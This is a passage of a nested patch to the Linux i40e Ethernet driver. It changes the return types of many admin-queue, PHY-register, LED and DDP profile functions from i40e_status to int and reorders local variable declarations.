+ 		(struct i40e_aqc_tx_sched_ind *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 	bool cmd_param_flag = false;
+ 
+ 	switch (opcode) {
+@@ -4093,14 +3951,14 @@ static i40e_status i40e_aq_tx_sched_cmd(struct i40e_hw *hw, u16 seid,
+  * @max_credit: Max BW limit credits
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
++int i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
+ 				u16 seid, u16 credit, u8 max_credit,
+ 				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_configure_vsi_bw_limit *cmd =
+ 		(struct i40e_aqc_configure_vsi_bw_limit *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_configure_vsi_bw_limit);
+@@ -4121,10 +3979,10 @@ i40e_status i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
+  * @bw_data: Buffer holding enabled TCs, relative TC BW limit/credits
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw,
++			     u16 seid,
++			     struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_configure_vsi_tc_bw,
+@@ -4139,11 +3997,12 @@ i40e_status i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw,
+  * @opcode: Tx scheduler AQ command opcode
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
+-		enum i40e_admin_queue_opc opcode,
+-		struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
++			       u16 seid,
++			       struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
++			       enum i40e_admin_queue_opc opcode,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)ets_data,
+ 				    sizeof(*ets_data), opcode, cmd_details);
+@@ -4156,7 +4015,8 @@ i40e_status i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
+  * @bw_data: Buffer holding enabled TCs, relative/absolute TC BW limit/credits
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
++int
++i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
+ 	u16 seid,
+ 	struct i40e_aqc_configure_switching_comp_bw_config_data *bw_data,
+ 	struct i40e_asq_cmd_details *cmd_details)
+@@ -4173,10 +4033,11 @@ i40e_status i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold VSI BW configuration
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
++			    u16 seid,
++			    struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
++			    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_vsi_bw_config,
+@@ -4190,10 +4051,11 @@ i40e_status i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold VSI BW configuration per TC
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
++				 u16 seid,
++				 struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_vsi_ets_sla_config,
+@@ -4207,10 +4069,11 @@ i40e_status i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold switching component's per TC BW config
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
++				     u16 seid,
++				     struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
++				     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				   i40e_aqc_opc_query_switching_comp_ets_config,
+@@ -4224,10 +4087,11 @@ i40e_status i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold current ETS configuration for the Physical Port
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_port_ets_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_port_ets_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_port_ets_config(struct i40e_hw *hw,
++			      u16 seid,
++			      struct i40e_aqc_query_port_ets_config_resp *bw_data,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_port_ets_config,
+@@ -4241,10 +4105,11 @@ i40e_status i40e_aq_query_port_ets_config(struct i40e_hw *hw,
+  * @bw_data: Buffer to hold switching component's BW configuration
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
++				    u16 seid,
++				    struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
++				    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	return i40e_aq_tx_sched_cmd(hw, seid, (void *)bw_data, sizeof(*bw_data),
+ 				    i40e_aqc_opc_query_switching_comp_bw_config,
+@@ -4263,8 +4128,9 @@ i40e_status i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
+  * Returns 0 if the values passed are valid and within
+  * range else returns an error.
+  **/
+-static i40e_status i40e_validate_filter_settings(struct i40e_hw *hw,
+-				struct i40e_filter_control_settings *settings)
++static int
++i40e_validate_filter_settings(struct i40e_hw *hw,
++			      struct i40e_filter_control_settings *settings)
+ {
+ 	u32 fcoe_cntx_size, fcoe_filt_size;
+ 	u32 fcoe_fmax;
+@@ -4350,11 +4216,11 @@ static i40e_status i40e_validate_filter_settings(struct i40e_hw *hw,
+  * for a single PF. It is expected that these settings are programmed
+  * at the driver initialization time.
+  **/
+-i40e_status i40e_set_filter_control(struct i40e_hw *hw,
+-				struct i40e_filter_control_settings *settings)
++int i40e_set_filter_control(struct i40e_hw *hw,
++			    struct i40e_filter_control_settings *settings)
+ {
+-	i40e_status ret = 0;
+ 	u32 hash_lut_size = 0;
++	int ret = 0;
+ 	u32 val;
+ 
+ 	if (!settings)
+@@ -4424,11 +4290,11 @@ i40e_status i40e_set_filter_control(struct i40e_hw *hw,
+  * In return it will update the total number of perfect filter count in
+  * the stats member.
+  **/
+-i40e_status i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
+-				u8 *mac_addr, u16 ethtype, u16 flags,
+-				u16 vsi_seid, u16 queue, bool is_add,
+-				struct i40e_control_filter_stats *stats,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
++					  u8 *mac_addr, u16 ethtype, u16 flags,
++					  u16 vsi_seid, u16 queue, bool is_add,
++					  struct i40e_control_filter_stats *stats,
++					  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_control_packet_filter *cmd =
+@@ -4437,7 +4303,7 @@ i40e_status i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_remove_control_packet_filter_completion *resp =
+ 		(struct i40e_aqc_add_remove_control_packet_filter_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (vsi_seid == 0)
+ 		return I40E_ERR_PARAM;
+@@ -4483,7 +4349,7 @@ void i40e_add_filter_to_drop_tx_flow_control_frames(struct i40e_hw *hw,
+ 		   I40E_AQC_ADD_CONTROL_PACKET_FLAGS_DROP |
+ 		   I40E_AQC_ADD_CONTROL_PACKET_FLAGS_TX;
+ 	u16 ethtype = I40E_FLOW_CONTROL_ETHTYPE;
+-	i40e_status status;
++	int status;
+ 
+ 	status = i40e_aq_add_rem_control_packet_filter(hw, NULL, ethtype, flag,
+ 						       seid, 0, true, NULL,
+@@ -4505,14 +4371,14 @@ void i40e_add_filter_to_drop_tx_flow_control_frames(struct i40e_hw *hw,
+  * is not passed then only register at 'reg_addr0' is read.
+  *
+  **/
+-static i40e_status i40e_aq_alternate_read(struct i40e_hw *hw,
+-					  u32 reg_addr0, u32 *reg_val0,
+-					  u32 reg_addr1, u32 *reg_val1)
++static int i40e_aq_alternate_read(struct i40e_hw *hw,
++				  u32 reg_addr0, u32 *reg_val0,
++				  u32 reg_addr1, u32 *reg_val1)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_alternate_write *cmd_resp =
+ 		(struct i40e_aqc_alternate_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!reg_val0)
+ 		return I40E_ERR_PARAM;
+@@ -4541,12 +4407,12 @@ static i40e_status i40e_aq_alternate_read(struct i40e_hw *hw,
+  *
+  * Suspend port's Tx traffic
+  **/
+-i40e_status i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
+-				    struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
++			    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aqc_tx_sched_ind *cmd;
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	cmd = (struct i40e_aqc_tx_sched_ind *)&desc.params.raw;
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_suspend_port_tx);
+@@ -4563,11 +4429,11 @@ i40e_status i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
+  *
+  * Resume port's Tx traffic
+  **/
+-i40e_status i40e_aq_resume_port_tx(struct i40e_hw *hw,
+-				   struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_resume_port_tx(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_resume_port_tx);
+ 
+@@ -4637,18 +4503,18 @@ void i40e_set_pci_config_data(struct i40e_hw *hw, u16 link_status)
+  * Dump internal FW/HW data for debug purposes.
+  *
+  **/
+-i40e_status i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
+-			       u8 table_id, u32 start_index, u16 buff_size,
+-			       void *buff, u16 *ret_buff_size,
+-			       u8 *ret_next_table, u32 *ret_next_index,
+-			       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
++		       u8 table_id, u32 start_index, u16 buff_size,
++		       void *buff, u16 *ret_buff_size,
++		       u8 *ret_next_table, u32 *ret_next_index,
++		       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_debug_dump_internals *cmd =
+ 		(struct i40e_aqc_debug_dump_internals *)&desc.params.raw;
+ 	struct i40e_aqc_debug_dump_internals *resp =
+ 		(struct i40e_aqc_debug_dump_internals *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (buff_size == 0 || !buff)
+ 		return I40E_ERR_PARAM;
+@@ -4689,12 +4555,12 @@ i40e_status i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
+  *
+  * Read bw from the alternate ram for the given pf
+  **/
+-i40e_status i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
+-				      u32 *max_bw, u32 *min_bw,
+-				      bool *min_valid, bool *max_valid)
++int i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
++			      u32 *max_bw, u32 *min_bw,
++			      bool *min_valid, bool *max_valid)
+ {
+-	i40e_status status;
+ 	u32 max_bw_addr, min_bw_addr;
++	int status;
+ 
+ 	/* Calculate the address of the min/max bw registers */
+ 	max_bw_addr = I40E_ALT_STRUCT_FIRST_PF_OFFSET +
+@@ -4729,13 +4595,14 @@ i40e_status i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
+  *
+  * Configure partitions guaranteed/max bw
+  **/
+-i40e_status i40e_aq_configure_partition_bw(struct i40e_hw *hw,
+-			struct i40e_aqc_configure_partition_bw_data *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_configure_partition_bw(struct i40e_hw *hw,
++			       struct i40e_aqc_configure_partition_bw_data *bw_data,
++			       struct i40e_asq_cmd_details *cmd_details)
+ {
+-	i40e_status status;
+-	struct i40e_aq_desc desc;
+ 	u16 bwd_size = sizeof(*bw_data);
++	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_configure_partition_bw);
+@@ -4764,11 +4631,11 @@ i40e_status i40e_aq_configure_partition_bw(struct i40e_hw *hw,
+  *
+  * Reads specified PHY register value
+  **/
+-i40e_status i40e_read_phy_register_clause22(struct i40e_hw *hw,
+-					    u16 reg, u8 phy_addr, u16 *value)
++int i40e_read_phy_register_clause22(struct i40e_hw *hw,
++				    u16 reg, u8 phy_addr, u16 *value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
+ 	u8 port_num = (u8)hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
+ 	u32 command = 0;
+ 	u16 retry = 1000;
+ 
+@@ -4809,11 +4676,11 @@ i40e_status i40e_read_phy_register_clause22(struct i40e_hw *hw,
+  *
+  * Writes specified PHY register value
+  **/
+-i40e_status i40e_write_phy_register_clause22(struct i40e_hw *hw,
+-					     u16 reg, u8 phy_addr, u16 value)
++int i40e_write_phy_register_clause22(struct i40e_hw *hw,
++				     u16 reg, u8 phy_addr, u16 value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
+ 	u8 port_num = (u8)hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
+ 	u32 command  = 0;
+ 	u16 retry = 1000;
+ 
+@@ -4850,13 +4717,13 @@ i40e_status i40e_write_phy_register_clause22(struct i40e_hw *hw,
+  *
+  * Reads specified PHY register value
+  **/
+-i40e_status i40e_read_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 *value)
++int i40e_read_phy_register_clause45(struct i40e_hw *hw,
++				    u8 page, u16 reg, u8 phy_addr, u16 *value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
++	u8 port_num = hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
+ 	u32 command = 0;
+ 	u16 retry = 1000;
+-	u8 port_num = hw->func_caps.mdio_port_num;
+ 
+ 	command = (reg << I40E_GLGEN_MSCA_MDIADD_SHIFT) |
+ 		  (page << I40E_GLGEN_MSCA_DEVADD_SHIFT) |
+@@ -4924,13 +4791,13 @@ phy_read_end:
+  *
+  * Writes value to specified PHY register
+  **/
+-i40e_status i40e_write_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 value)
++int i40e_write_phy_register_clause45(struct i40e_hw *hw,
++				     u8 page, u16 reg, u8 phy_addr, u16 value)
+ {
+-	i40e_status status = I40E_ERR_TIMEOUT;
+-	u32 command = 0;
+-	u16 retry = 1000;
+ 	u8 port_num = hw->func_caps.mdio_port_num;
++	int status = I40E_ERR_TIMEOUT;
++	u16 retry = 1000;
++	u32 command = 0;
+ 
+ 	command = (reg << I40E_GLGEN_MSCA_MDIADD_SHIFT) |
+ 		  (page << I40E_GLGEN_MSCA_DEVADD_SHIFT) |
+@@ -4991,10 +4858,10 @@ phy_write_end:
+  *
+  * Writes value to specified PHY register
+  **/
+-i40e_status i40e_write_phy_register(struct i40e_hw *hw,
+-				    u8 page, u16 reg, u8 phy_addr, u16 value)
++int i40e_write_phy_register(struct i40e_hw *hw,
++			    u8 page, u16 reg, u8 phy_addr, u16 value)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	switch (hw->device_id) {
+ 	case I40E_DEV_ID_1G_BASE_T_X722:
+@@ -5030,10 +4897,10 @@ i40e_status i40e_write_phy_register(struct i40e_hw *hw,
+  *
+  * Reads specified PHY register value
+  **/
+-i40e_status i40e_read_phy_register(struct i40e_hw *hw,
+-				   u8 page, u16 reg, u8 phy_addr, u16 *value)
++int i40e_read_phy_register(struct i40e_hw *hw,
++			   u8 page, u16 reg, u8 phy_addr, u16 *value)
+ {
+-	i40e_status status;
++	int status;
+ 
+ 	switch (hw->device_id) {
+ 	case I40E_DEV_ID_1G_BASE_T_X722:
+@@ -5082,17 +4949,17 @@ u8 i40e_get_phy_address(struct i40e_hw *hw, u8 dev_num)
+  *
+  * Blinks PHY link LED
+  **/
+-i40e_status i40e_blink_phy_link_led(struct i40e_hw *hw,
+-				    u32 time, u32 interval)
++int i40e_blink_phy_link_led(struct i40e_hw *hw,
++			    u32 time, u32 interval)
+ {
+-	i40e_status status = 0;
+-	u32 i;
+-	u16 led_ctl;
+-	u16 gpio_led_port;
+-	u16 led_reg;
+ 	u16 led_addr = I40E_PHY_LED_PROV_REG_1;
++	u16 gpio_led_port;
+ 	u8 phy_addr = 0;
++	int status = 0;
++	u16 led_ctl;
+ 	u8 port_num;
++	u16 led_reg;
++	u32 i;
+ 
+ 	i = rd32(hw, I40E_PFGEN_PORTNUM);
+ 	port_num = (u8)(i & I40E_PFGEN_PORTNUM_PORT_NUM_MASK);
+@@ -5154,12 +5021,12 @@ phy_blinking_end:
+  * @led_addr: LED register address
+  * @reg_val: read register value
+  **/
+-static enum i40e_status_code i40e_led_get_reg(struct i40e_hw *hw, u16 led_addr,
+-					      u32 *reg_val)
++static int i40e_led_get_reg(struct i40e_hw *hw, u16 led_addr,
++			    u32 *reg_val)
+ {
+-	enum i40e_status_code status;
+ 	u8 phy_addr = 0;
+ 	u8 port_num;
++	int status;
+ 	u32 i;
+ 
+ 	*reg_val = 0;
+@@ -5188,12 +5055,12 @@ static enum i40e_status_code i40e_led_get_reg(struct i40e_hw *hw, u16 led_addr,
+  * @led_addr: LED register address
+  * @reg_val: register value to write
+  **/
+-static enum i40e_status_code i40e_led_set_reg(struct i40e_hw *hw, u16 led_addr,
+-					      u32 reg_val)
++static int i40e_led_set_reg(struct i40e_hw *hw, u16 led_addr,
++			    u32 reg_val)
+ {
+-	enum i40e_status_code status;
+ 	u8 phy_addr = 0;
+ 	u8 port_num;
++	int status;
+ 	u32 i;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_AQ_PHY_ACCESS_CAPABLE) {
+@@ -5223,17 +5090,17 @@ static enum i40e_status_code i40e_led_set_reg(struct i40e_hw *hw, u16 led_addr,
+  * @val: original value of register to use
+  *
+  **/
+-i40e_status i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
+-			     u16 *val)
++int i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
++		     u16 *val)
+ {
+-	i40e_status status = 0;
+ 	u16 gpio_led_port;
+ 	u8 phy_addr = 0;
+-	u16 reg_val;
++	u32 reg_val_aq;
++	int status = 0;
+ 	u16 temp_addr;
++	u16 reg_val;
+ 	u8 port_num;
+ 	u32 i;
+-	u32 reg_val_aq;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_AQ_PHY_ACCESS_CAPABLE) {
+ 		status =
+@@ -5278,12 +5145,12 @@ i40e_status i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
+  * Set led's on or off when controlled by the PHY
+  *
+  **/
+-i40e_status i40e_led_set_phy(struct i40e_hw *hw, bool on,
+-			     u16 led_addr, u32 mode)
++int i40e_led_set_phy(struct i40e_hw *hw, bool on,
++		     u16 led_addr, u32 mode)
+ {
+-	i40e_status status = 0;
+ 	u32 led_ctl = 0;
+ 	u32 led_reg = 0;
++	int status = 0;
+ 
+ 	status = i40e_led_get_reg(hw, led_addr, &led_reg);
+ 	if (status)
+@@ -5327,14 +5194,14 @@ restore_config:
+  * Use the firmware to read the Rx control register,
+  * especially useful if the Rx unit is under heavy pressure
+  **/
+-i40e_status i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 *reg_val,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
++				 u32 reg_addr, u32 *reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_rx_ctl_reg_read_write *cmd_resp =
+ 		(struct i40e_aqc_rx_ctl_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!reg_val)
+ 		return I40E_ERR_PARAM;
+@@ -5358,8 +5225,8 @@ i40e_status i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
+  **/
+ u32 i40e_read_rx_ctl(struct i40e_hw *hw, u32 reg_addr)
+ {
+-	i40e_status status = 0;
+ 	bool use_register;
++	int status = 0;
+ 	int retry = 5;
+ 	u32 val = 0;
+ 
+@@ -5393,14 +5260,14 @@ do_retry:
+  * Use the firmware to write to an Rx control register,
+  * especially useful if the Rx unit is under heavy pressure
+  **/
+-i40e_status i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 reg_val,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
++				  u32 reg_addr, u32 reg_val,
++				  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_rx_ctl_reg_read_write *cmd =
+ 		(struct i40e_aqc_rx_ctl_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_rx_ctl_reg_write);
+ 
+@@ -5420,8 +5287,8 @@ i40e_status i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
+  **/
+ void i40e_write_rx_ctl(struct i40e_hw *hw, u32 reg_addr, u32 reg_val)
+ {
+-	i40e_status status = 0;
+ 	bool use_register;
++	int status = 0;
+ 	int retry = 5;
+ 
+ 	use_register = (((hw->aq.api_maj_ver == 1) &&
+@@ -5483,16 +5350,16 @@ static void i40e_mdio_if_number_selection(struct i40e_hw *hw, bool set_mdio,
+  * NOTE: In common cases MDIO I/F number should not be changed, thats why you
+  * may use simple wrapper i40e_aq_set_phy_register.
+  **/
+-enum i40e_status_code i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
+-			     u8 phy_select, u8 dev_addr, bool page_change,
+-			     bool set_mdio, u8 mdio_num,
+-			     u32 reg_addr, u32 reg_val,
+-			     struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
++				 u8 phy_select, u8 dev_addr, bool page_change,
++				 bool set_mdio, u8 mdio_num,
++				 u32 reg_addr, u32 reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_phy_register_access *cmd =
+ 		(struct i40e_aqc_phy_register_access *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_phy_register);
+@@ -5528,16 +5395,16 @@ enum i40e_status_code i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
+  * NOTE: In common cases MDIO I/F number should not be changed, thats why you
+  * may use simple wrapper i40e_aq_get_phy_register.
+  **/
+-enum i40e_status_code i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+-			     u8 phy_select, u8 dev_addr, bool page_change,
+-			     bool set_mdio, u8 mdio_num,
+-			     u32 reg_addr, u32 *reg_val,
+-			     struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
++				 u8 phy_select, u8 dev_addr, bool page_change,
++				 bool set_mdio, u8 mdio_num,
++				 u32 reg_addr, u32 *reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_phy_register_access *cmd =
+ 		(struct i40e_aqc_phy_register_access *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_phy_register);
+@@ -5568,18 +5435,17 @@ enum i40e_status_code i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+  * @error_info: returns error information
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum
+-i40e_status_code i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
+-				   u16 buff_size, u32 track_id,
+-				   u32 *error_offset, u32 *error_info,
+-				   struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
++		      u16 buff_size, u32 track_id,
++		      u32 *error_offset, u32 *error_info,
++		      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_write_personalization_profile *cmd =
+ 		(struct i40e_aqc_write_personalization_profile *)
+ 		&desc.params.raw;
+ 	struct i40e_aqc_write_ddp_resp *resp;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_write_personalization_profile);
+@@ -5612,15 +5478,14 @@ i40e_status_code i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
+  * @flags: AdminQ command flags
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum
+-i40e_status_code i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
+-				      u16 buff_size, u8 flags,
+-				      struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
++			 u16 buff_size, u8 flags,
++			 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_applied_profiles *cmd =
+ 		(struct i40e_aqc_get_applied_profiles *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_personalization_profile_list);
+@@ -5719,14 +5584,13 @@ i40e_find_section_in_profile(u32 section_type,
+  * @hw: pointer to the hw struct
+  * @aq: command buffer containing all data to execute AQ
+  **/
+-static enum
+-i40e_status_code i40e_ddp_exec_aq_section(struct i40e_hw *hw,
+-					  struct i40e_profile_aq_section *aq)
++static int i40e_ddp_exec_aq_section(struct i40e_hw *hw,
++				    struct i40e_profile_aq_section *aq)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	u8 *msg = NULL;
+ 	u16 msglen;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, aq->opcode);
+ 	desc.flags |= cpu_to_le16(aq->flags);
+@@ -5766,14 +5630,14 @@ i40e_status_code i40e_ddp_exec_aq_section(struct i40e_hw *hw,
+  *
+  * Validates supported devices and profile's sections.
+  */
+-static enum i40e_status_code
++static int
+ i40e_validate_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 		      u32 track_id, bool rollback)
+ {
+ 	struct i40e_profile_section_header *sec = NULL;
+-	i40e_status status = 0;
+ 	struct i40e_section_table *sec_tbl;
+ 	u32 vendor_dev_id;
++	int status = 0;
+ 	u32 dev_cnt;
+ 	u32 sec_off;
+ 	u32 i;
+@@ -5831,16 +5695,16 @@ i40e_validate_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Handles the download of a complete package.
+  */
+-enum i40e_status_code
++int
+ i40e_write_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 		   u32 track_id)
+ {
+-	i40e_status status = 0;
+-	struct i40e_section_table *sec_tbl;
+ 	struct i40e_profile_section_header *sec = NULL;
+ 	struct i40e_profile_aq_section *ddp_aq;
